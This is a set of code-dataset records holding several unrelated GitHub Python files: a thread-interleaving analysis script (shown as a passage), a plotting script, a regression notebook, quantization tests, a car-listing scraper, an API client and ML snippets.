locations.')\nargparser.add_argument('-uti', '--unordered_thread_ids', action='store_true', help='Maintain original thread ID order.')\nargparser.add_argument('-dc', '--disable_coverage', action='store_true', help='Disable coverage analysis.')\nargparser.add_argument('-di', '--disable_interleaving', action='store_true', help='Disable interleaving analysis.')\nargparser.add_argument('-of', '--output_flags', type=str, help='Flags which will be checked in program output.')\n\nargv = argparser.parse_args()\n\n# Check distance alg valid\nif argv.distance_algorithm < 0 or argv.distance_algorithm > len(DISTANCE_ALGS) - 1:\n print(f'Invalid distance algorithm.')\n exit(1)\n\n# Check if file exists\nif not os.path.isdir(argv.program_dir):\n print(f'Folder {argv.program_dir} not found')\n exit(1)\n\nos.chdir(argv.program_dir)\n\n# Remove old generated files\nif os.path.isdir('oscar_output'):\n shutil.rmtree('oscar_output')\n\n###############################################################################################################\n\n# Save runtimes\nruntimes = []\n\nrun_counts = []\nfor rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\nruns = run_counts[len(run_counts) - 1]\n\nprint(f'Running program {argv.count} times')\n\nFLAGS = str(argv.output_flags).split(\",\")\nflags_detected = {}\n\n# Run program x times\nfor i in tqdm(range(0, runs), desc=\"Variable Args\"):\n start_time = time.time_ns() / 1_000_000\n\n if not argv.jar:\n result = subprocess.run(\n f'java {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n else:\n result = subprocess.run(\n f'java -jar {argv.executable} {argv.program_args}',\n shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n\n if result.returncode != 0:\n print(result.stderr.decode('utf-8'))\n print(result.stdout.decode('utf-8'))\n\n # Check the 
output for flags\n output = result.stdout.decode('utf-8')\n\n # Parse line by line to check for flags\n for line in output.split(\"\\n\"):\n for flag in FLAGS:\n if flag in line:\n if line in flags_detected:\n flags_detected[line] = flags_detected[line] + 1\n else:\n flags_detected[line] = 1\n break\n\n for rc in str(argv.count).split(\",\"):\n run_counts.append(int(rc))\n\n runtimes.append(time.time_ns() / 1_000_000 - start_time)\n\nprint(f'Finished running. Analyzing files.')\n\n###############################################################################################################\n\n\n###############################################################################################################\n\nprint()\nprint(\"Results:\")\nprint(f'\\tAverage runtime (ms): {round(np.average(runtimes), 0)}')\n\nfor flag in flags_detected:\n print(f'\\tDetected flag_-_-{flag}-_-_{flags_detected[flag]}')\n\nif not argv.disable_coverage:\n # Try to analyze created files\n os.chdir('oscar_output')\n files = os.listdir('.')\n\n location_ids = {}\n interleavings = []\n trace_pairs = {}\n\n for file in files:\n content = open(file, 'r') # .read()\n thread_ids = []\n trace_pairs_count = {}\n\n interleaving = ''\n\n # Get all thread ids for ordering\n for line in content:\n thread_id = int(line.split(' ')[0].strip())\n if thread_id not in thread_ids:\n thread_ids.append(thread_id)\n\n # Check if thread ids should maintain order when mapped\n if argv.unordered_thread_ids:\n thread_ids = numpy.sort(thread_ids)\n\n # Map thread ids\n mapped_thread_ids = {}\n for i in range(0, len(thread_ids)):\n mapped_thread_ids[thread_ids[i]] = to_unicode(i)\n\n # Parse normally\n content = open(file, 'r')\n\n for line in content:\n thread_id = mapped_thread_ids[int(line.split(' ')[0].strip())]\n\n # Make the interleaving id value start from 0\n location_id = line.split(' ')[1].strip()\n if location_id not in location_ids:\n location_ids[location_id] = to_unicode(len(location_ids) + len(thread_ids))\n location_id = location_ids[location_id]\n\n # Append content with or without thread id\n trace_pair = location_id\n if not argv.disable_thread_ids:\n trace_pair = f'{thread_id}{trace_pair}'\n\n # Check if this interleaving pair is duplicate and needs new assigned id\n if argv.unique_trace_locations:\n if trace_pair not in trace_pairs_count:\n trace_pairs_count[trace_pair] = 0\n trace_pairs_count[trace_pair] += 1\n\n trace_pair = f'{trace_pairs_count[trace_pair]}_{trace_pair}'\n\n # Transform interleaving pair representation in single mapped unicode\n if trace_pair not in trace_pairs:\n trace_pairs[trace_pair] = to_unicode(len(trace_pairs))\n\n interleaving += trace_pairs[trace_pair]\n\n interleavings.append(interleaving)\n\n # Parse interleavings\n avg_dist_runs = {}\n std_dev_runs = {}\n uniq_interleavings_runs = {}\n avg_cluster_size = {}\n\n for rc in run_counts:\n interleavings_split = interleavings[0:rc]\n uniq_interleavings_runs[rc] = len(set(interleavings_split))\n\n clusters = {}\n # Calculate avg cluster size\n for interleaving in interleavings_split:\n if interleaving not in clusters:\n clusters[interleaving] = 1\n else:\n clusters[interleaving] += 1\n\n avg_cluster_size[rc] = np.average(list(clusters.values()))\n\n # For regular pairs\n interleaving_dists = []\n interleaving_dist = 0\n\n # Calculate average ratio\n if not argv.disable_coverage:\n for x in range(0, len(interleavings_split) - 1):\n for y in range(x + 1, len(interleavings_split)):\n ix = interleavings_split[x]\n iy = interleavings_split[y]\n\n # 
Levenshtein\n if argv.distance_algorithm == 0:\n interleaving_dist = jf.levenshtein_distance(ix, iy)\n\n # Damerau-Levenshtein\n if argv.distance_algorithm == 1:\n interleaving_dist = jf.damerau_levenshtein_distance(ix, iy)\n\n # Jaro\n if argv.distance_algorithm == 2:\n interleaving_dist = jf.jaro_similarity(ix, iy)\n\n # Jaro-Wrinkler\n if argv.distance_algorithm == 3:\n interleaving_dist = jf.jaro_winkler_similarity(ix, iy)\n\n # Hamming\n if argv.distance_algorithm == 4:\n interleaving_dist = jf.hamming_distance(ix, iy)\n\n interleaving_dists.append(interleaving_dist)\n else:\n interleaving_dists.append(1)\n\n avg_dist_runs[rc] = round(np.average(interleaving_dists), 4)\n std_dev_runs[rc] = round(float(np.std(interleaving_dists)), 4)\n\n distance_alg = DISTANCE_ALGS[argv.distance_algorithm]\n print(f'\\tUnique interleavings: {flatten_results_map(uniq_interleavings_runs)}')\n print(f'\\tAverage {distance_alg} distance: {flatten_results_map(avg_dist_runs)}')\n print(f'\\t{distance_alg} distance standard deviation: {flatten_results_map(std_dev_runs)}')\n print(f'\\tAverage Cluster Size: {flatten_results_map(avg_cluster_size)}')\n", "repo_name": "filipedeluna/oscar", "sub_path": "py_scripts/testscript/testscript.py", "file_name": "testscript.py", "file_ext": "py", "file_size_in_byte": 9280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 92, "usage_type": "call"}, {"api_name": "time.time_ns", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 96, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 98, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 101, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "time.time_ns", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 137, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 144, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 224, "usage_type": "call"}, {"api_name": "jellyfish.levenshtein_distance", "line_number": 239, "usage_type": "call"}, {"api_name": "jellyfish.damerau_levenshtein_distance", "line_number": 243, "usage_type": "call"}, {"api_name": "jellyfish.jaro_similarity", "line_number": 247, "usage_type": "call"}, {"api_name": "jellyfish.jaro_winkler_similarity", "line_number": 251, "usage_type": "call"}, {"api_name": "jellyfish.hamming_distance", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 262, "usage_type": "call"}]}
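The testscript.py record above drives a Java program repeatedly and then scores the recorded thread interleavings by pairwise string distance. Two things stand out: the run loop re-appends the parsed `argv.count` values to `run_counts` on every iteration (the list is already populated once before the loop, so it grows needlessly and the later `for rc in run_counts:` analysis repeats the same counts), and the nested pair loop is the core of the analysis. A minimal, self-contained sketch of that pairwise aggregation, with invented interleaving strings in place of real trace output:

import numpy as np
import jellyfish as jf

# Stand-in interleavings; the script above builds these from trace files.
interleavings = ["abcab", "abcba", "aacab", "abcab"]

# All unordered pairs, scored with Levenshtein distance (distance_algorithm 0).
dists = [
    jf.levenshtein_distance(interleavings[x], interleavings[y])
    for x in range(len(interleavings) - 1)
    for y in range(x + 1, len(interleavings))
]

print("unique interleavings:", len(set(interleavings)))
print("average distance:", round(np.average(dists), 4))
print("std deviation:", round(float(np.std(dists)), 4))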
+{"seq_id": "28213444995", "text": "import os\nimport argparse\n\nimport numpy\nimport matplotlib.pyplot as P\n\nfrom scipy.special import jacobi\n\ndef loaddispersion(fname):\n\n f = open(fname, 'r')\n lines = f.readlines()\n\n slon, slat, dlon, dlat, distkm = map(float, lines[0].split())\n freq, count, acsn, csn, N = map(float, lines[1].split())\n\n f, r, i, ncfr, ncfi = zip(*map(lambda x: map(float, x.split()), lines[2:]))\n\n spec = numpy.array(r) + numpy.array(i)*1.0j\n ncf = numpy.array(ncfr) + numpy.array(ncfi)*1.0j\n return (slon, slat, dlon, dlat, distkm, int(count)), numpy.array(f), freq, acsn, csn, spec, ncf\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-f', '--fits', type = str, required = True, help = 'Fits base path')\n\n parser.add_argument('-d', '--data', type = str, default = '../example_data', help = 'Data base path')\n\n parser.add_argument('--width', type = float, default = 8.0, help = 'Figure width')\n parser.add_argument('--height', type = float, default = 3.0, help = 'Figure height')\n \n args = parser.parse_args()\n\n if os.access(os.path.join(args.fits, 'opt.pred'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred'))\n elif os.access(os.path.join(args.fits, 'opt.pred-rayleigh'), os.R_OK):\n rayleighpred = numpy.loadtxt(os.path.join(args.fits, 'opt.pred-rayleigh'))\n else:\n raise Exception('No predictions file %s found' % os.path.join(args.fits, 'opt.pred'))\n\n stationpair = '_'.join(os.path.basename(args.fits.rstrip('/')).split('_')[1:3])\n\n rayleighdata = os.path.join(args.data, 'RayleighResponse/dispersion_%s.txt' % stationpair)\n\n (_, _, _, _, distkm, _), f, sample_rate, rayleigh_acsn, rayleigh_csn, rayleigh_spec, rayleigh_ncf = loaddispersion(rayleighdata)\n\n figB, bx = P.subplots()\n figB.set_size_inches((args.width, args.height))\n figB.set_tight_layout(True)\n\n #\n # Modulated Bessel is column 5, Raw Bessel is column 3, Envelope 4\n #\n colindex = 5\n #colindex = 3\n\n indices = numpy.where(rayleighpred[:,1] > 0.0)[0]\n\n bx.set_title('Rayleigh')\n bx.plot(rayleighpred[indices,0], rayleighpred[indices,colindex], 'r-', linewidth = 1, zorder = 100)\n bx.plot(f, numpy.real(rayleigh_ncf), linestyle = 'solid', color = 'grey', linewidth = 2, zorder = 50)\n\n bx.set_xlim(0, 0.4)\n\n bx.set_xlabel('Frequency (Hz)')\n\n P.show()\n", "repo_name": "rhyshawkins/AkiEstimate", "sub_path": "tutorial/scripts/plot_bessel_result_rayleigh.py", "file_name": "plot_bessel_result_rayleigh.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 9, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.access", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.access", "line_number": 38, "usage_type": "call"}, 
{"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.R_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.loadtxt", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.real", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}]}
+{"seq_id": "12441036076", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # Tanya Aggarwal\n# \n# # GRIP JUNE'22\n\n# # Prediction of student's study hours by linear regression\n# \n\n# # LINEAR REGRESSION:- \n# Linear regression analysis is used to predict the value of a variable based on the value of another variable. The variable you want to predict is called the dependent variable. The variable you are using to predict the other variable's value is called the independent variable.\n# \n# #simple linear regression:- In this task we will predict the percentage of marks that a student is expected to score based upon the number of hours they studies.\n# \n# As only two variables are involved i.e 1 dependent and 1 independent variable ,this is Simple linear regresion\n# \n# \n\n# In[2]:\n\n\n#importing Libraries\nimport pandas as pd #for manipulationg and analyse the data\nimport numpy as np #for numerical data\nimport matplotlib.pyplot as plt #for plotting the data\n#%matplotlib inline # for inline plotting(below the commands)\n\n\n# In[3]:\n\n\n#Importing Data\nurl='https://raw.githubusercontent.com/AdiPersonalWorks/Random/master/student_scores%20-%20student_scores.csv'\ndf1=pd.read_csv(url) #to read the data \nprint(\"Data imported successfully\")\nprint(df1)\n\n\n# In[4]:\n\n\n#if we want to print the limited values\ndf1.head(2) #to get upper values\ndf1.tail(2) #to get below values\n\n\n# In[5]:\n\n\n#Plotting the distribution of scores\ndf1.plot(x='Hours', y='Scores',style='o') #ploptting(we can change style *,1)\nplt.title('Hours vs Percentage') #title of graph\nplt.xlabel('Hours Studied') #label x axis\nplt.ylabel('Percentage Score') #label y axis\nplt.show()\n\n\n# In[6]:\n\n\n#As we can see the above graph, we can conclude that as hours studied increases ,percentafe increases. So, we can say that \n#there's a positive linear relation between two variables\n\n\n# # Preparing the data\n\n# In[7]:\n\n\n#Step-1:-In the next step we're going to divide data into \"attributes\"(inputs) and\"labels\"(Outputs)\n#Independent and Deoendent features\nx=df1.iloc[:,:-1].values #iloc() function enables us to select a particular cell of the dataset\n#print(x)\ny=df1.iloc[:,-1].values \nprint(y)\n\n\n# In[9]:\n\n\n#step 2-Split the data into training and testing sets by Using Scikit -learn's built in train_test_split()method\n# train_test_split is a function in Sklearn model selection for splitting data arrays into two subsets:\n#for training data and for testing data. 
With this function, you don't need to divide the dataset manually.\n#By default, Sklearn train_test_split will make random partitions for the two subsets\n\nfrom sklearn.model_selection import train_test_split\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2,random_state=0) #,test_size=0.2=20% for testing\n\n\n# # Training the Algorithm\n# \n\n# In[10]:\n\n\n#step-3:- Train the Algorithm\n\nfrom sklearn.linear_model import LinearRegression\nregressor=LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"Training Done\")\n\n\n# In[11]:\n\n\n#step 4:- Plotting the training line\nline = regressor.coef_*x+regressor.intercept_\n\n#Plotting the test data\nplt.scatter(x,y)\nplt.plot(x,line);\nplt.show()\n\n\n# # Prediction\n\n# In[12]:\n\n\nprint(x_test) #testing data in hours\ny_pred=regressor.predict(x_test) #predicting the scores\nprint(y_pred)\n\n\n# In[13]:\n\n\n#Comparing Actual Vs prediction\ndf2=pd.DataFrame({'Actual': y_test,'Predicted': y_pred})\ndf2\n\n\n# In[14]:\n\n\n#Checking own data\nhours=9.25\nown_pred=regressor.predict([[hours]])\nprint('Predicted score if student study 9.25 hours/day')\nprint('No. of hours={}'.format(hours))\nprint('Predicted Score={}'.format(own_pred[0]))\n\n\n# In[15]:\n\n\nfrom sklearn import metrics\nprint('Mean Absolute Error:',metrics.mean_absolute_error(y_test,y_pred))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "tanya99aggarwal/The-Sparks-Foundation-Internship", "sub_path": "GRIPJUNE'22 (Task -1).py", "file_name": "GRIPJUNE'22 (Task -1).py", "file_ext": "py", "file_size_in_byte": 3895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_absolute_error", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 150, "usage_type": "name"}]}
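The notebook record above walks through simple linear regression on an hours-vs-scores table. A condensed sketch of the same fit/predict flow, with made-up data standing in for the CSV, including the single-sample prediction the notebook makes for 9.25 study hours:

import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import train_test_split

hours = np.array([[1.5], [3.2], [5.1], [7.4], [8.9], [2.7]])  # invented
scores = np.array([20, 35, 52, 75, 88, 30])

x_train, x_test, y_train, y_test = train_test_split(
    hours, scores, test_size=0.2, random_state=0)

reg = LinearRegression().fit(x_train, y_train)
print("test predictions:", reg.predict(x_test))
print("9.25 h/day ->", reg.predict([[9.25]])[0])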
+{"seq_id": "72077476647", "text": "import pytest\nimport torch\nimport numpy as np\nimport sys\n\nfrom .common_lib import (\n check_diff,\n check_diff_quantize,\n all_encodings\n)\n\nfrom mx.formats import _get_format_params\nfrom mx.mx_ops import _quantize_mx\n\nnp.random.seed(0xd10)\n\nDEVICE__CUSTOM_CUDA = [\n (\"cpu\", False),\n (\"cpu\", True),\n (\"cuda\", True),\n]\n\nELEM_FMTS = [\n (\"fp8_e5m2\"),\n (\"fp8_e4m3\"),\n (\"fp6_e3m2\"),\n (\"fp6_e2m3\"),\n (\"fp4_e2m1\"),\n (\"int4\"),\n]\n\n\n@pytest.mark.parametrize(\"scale_bits\", (8,5))\n@pytest.mark.parametrize(\"elem_format\", ELEM_FMTS)\n@pytest.mark.parametrize(\"block_size\", (8, 9, 64))\n@pytest.mark.parametrize(\"round\", ('nearest', 'floor', 'even'))\n@pytest.mark.parametrize(\"flush_fp32_subnorms\", (False,True))\n@pytest.mark.parametrize(\"device, custom_cuda\", DEVICE__CUSTOM_CUDA)\ndef test_mx_encoding(scale_bits, elem_format, block_size, round,\n flush_fp32_subnorms, device, custom_cuda):\n\n x1 = all_encodings(8, 9, device=\"cpu\")\n x2 = x1.clone().detach().to(device)\n\n y1 = _quantize_mx(x1, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=False)\n\n\n y2 = _quantize_mx(x2, scale_bits, elem_format,\n block_size=block_size,\n axes=[-1],\n round=round,\n flush_fp32_subnorms=flush_fp32_subnorms,\n custom_cuda=custom_cuda)\n\n check_diff_quantize(x1, y1, y2)\n", "repo_name": "microsoft/microxcaling", "sub_path": "mx/tests/test_quantize_mx.py", "file_name": "test_quantize_mx.py", "file_ext": "py", "file_size_in_byte": 1607, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 52, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 15, "usage_type": "attribute"}, {"api_name": "common_lib.all_encodings", "line_number": 42, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 45, "usage_type": "call"}, {"api_name": "mx.mx_ops._quantize_mx", "line_number": 53, "usage_type": "call"}, {"api_name": "common_lib.check_diff_quantize", "line_number": 60, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 33, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 35, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 36, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 37, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}]}
+{"seq_id": "15775683815", "text": "from bs4 import BeautifulSoup\nimport requests\n\nurl = 'https://www.mobile.bg/pcgi/mobile.cgi?act=3&slink=rxes3n&f1=1'\nhtml_sc = requests.get(url).text\nsoup = BeautifulSoup(html_sc, 'html5lib')\nmock_budget = 10000\n\ndef year_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '')\n return int(string[:4])\n\n\ndef price_popper(string):\n basic_nums = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n for char in string:\n if char not in basic_nums:\n string = string.replace(char, '') \n try:\n return int(string)\n except ValueError:\n return 0 \n\nnum_page = soup.find_all('a', class_ = 'pageNumbers')\npages_links = []\npages_links.append(url)\n\nfor index, i in enumerate(num_page):\n i = num_page[index]['href'] \n i = 'https:' + i\n if i not in pages_links:\n pages_links.append(i)\n\ncounter = 1\n\nfor link in pages_links:\n url = link\n page_url = requests.get(url).text\n page_soup = BeautifulSoup(page_url, 'html5lib')\n all_listings_per_page = page_soup.find_all('table', class_ = 'tablereset', style='width:660px; margin-bottom:0px; border-top:#008FC6 1px solid;')\n page_info = page_soup.find('span', class_ = 'pageNumbersInfo').text\n\n for listing in all_listings_per_page:\n urll = listing.find('td', class_ = 'valgtop', style = 'width:162px;height:40px;padding-left:4px').a\n linkk = 'https:' + urll['href']\n title = urll.text\n price = listing.find('td', class_ = 'algright valgtop', style = 'width:135px;height:40px;padding-left:4px').span.text\n production_year = listing.find('td', style = 'width:440px;height:50px;padding-left:4px').text\n\n price = price_popper(price)\n production_year = year_popper(production_year)\n print(\"Listing: \", counter, \" \", production_year, title, price)\n counter+=1\n\n # if E30\n if production_year in range(1982, 1995):\n if price <= mock_budget:\n with open('e30-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n with open('dream-car-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n # if E36 \n elif production_year in range(1996, 2000):\n if '316' in title or '1.6' in title:\n continue\n elif price <= mock_budget:\n with open('e36-list.md', 'a') as ff:\n ff.write(f\"Model: {title}\\n\")\n ff.write(f\"Year: {production_year}\\n\")\n ff.write(f\"URL: {linkk}\\n\")\n ff.write(f\"Price: {price}\\n\\n\\n\")\n else:\n continue\n", "repo_name": "jr94242/bs4-scraper", "sub_path": "mobile-e36.py", "file_name": "mobile-e36.py", "file_ext": "py", "file_size_in_byte": 3126, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 5, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 6, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "17858569692", "text": "import requests\nfrom werkzeug.wrappers import response\nfrom flask import session\nfrom . import Schedule_API_URL\n\n\nclass ScheduleClient:\n @staticmethod\n def get_schedules():\n #header = {'Authorization': session['user_api_key']}\n response = requests.get(Schedule_API_URL +\n '/api/schedule/all') #headers=header)\n return response.json()\n\n @staticmethod\n def create_schedule(form):\n #header = {'Authorization': session['user_api_key']}\n payload = {\n 'name': form.name.data,\n 'state': form.state.data,\n 'city': form.city.data,\n 'vaccination_cite': form.vaccination_cite.data,\n 'first_slot': form.first_slot.data,\n 'second_slot': form.second_slot.data,\n 'medical_condition': form.medical_condition.data,\n }\n\n response = requests.post(Schedule_API_URL + '/api/schedule/create',\n data=payload) #headers=header)\n return response.json()\n\n @staticmethod\n def get_schedule_from_session():\n default_schedule = {\n 'items': {}\n }\n return session.get('schedule', default_schedule)\n", "repo_name": "biallenchanuow/CSCI927", "sub_path": "vaccine/frontend/api/schedule_api.py", "file_name": "schedule_api.py", "file_ext": "py", "file_size_in_byte": 1211, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "werkzeug.wrappers.response", "line_number": 11, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 13, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 13, "usage_type": "name"}, {"api_name": "werkzeug.wrappers.response", "line_number": 28, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 28, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response.json", "line_number": 30, "usage_type": "call"}, {"api_name": "werkzeug.wrappers.response", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.session.get", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "8758506778", "text": "# Hazır kodlar \r\n\r\n# KARAR AGACI YAPISI \r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\ndt = DecisionTreeRegressor(random_state=0)\r\ndt.fit(egitimx,egitimy)\r\n\r\ntahmin = dt .predict(testx)\r\n\r\nprint(\"KARAR AGACI R2 DEGERİ\")\r\nprint(r2_score(testy , tahmin))\r\n\r\n\r\n\r\n#RANDOM FOREST REGRESSİON\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nrf_reg = RandomForestRegressor(n_estimators=10, random_state=0)\r\nrf_reg.fit(X, y)\r\ntahmin= rf_reg.predict(X)\r\nprint(\"RASSAL ORMAN R2 DEGERİ\")\r\nprint(r2_score(testy,tahmin))\r\n\r\n#POLİNOM REGRESYON\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\npoly_reg = PolynomialFeatures(degree = 2) #degree degeri polinomun kaçıncı dereceden olacagını belirler \r\nx_poly = poly_reg.fit(trainx)\r\npoli = LinearRegression()\r\npoli.fit(x_poly,trainy)\r\ntahmin = poli.predict(poly_reg.fit_transform(testx))\r\nprint(\"POLİNOM REGRESYON R2 DEGERİ\")\r\nprint(r2_score(testy,poli.predict(poly_reg.fit_transform(testx))))\r\n\r\n\r\n#ÇAPRAZ DOGRULAMA \r\n\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\nkvs =cross_val_score(dt, trainx, trainy,cv=5)\r\nprint(\"ÇAPRAZ DOGRULAMA R2 SCORE\")\r\nprint(kvs)\r\nprint(np.mean(kvs))\r\n", "repo_name": "BeytullahArslann/Machine-Learning", "sub_path": "Hazır kodlar.py", "file_name": "Hazır kodlar.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sklearn.tree.DecisionTreeRegressor", "line_number": 6, "usage_type": "call"}, {"api_name": 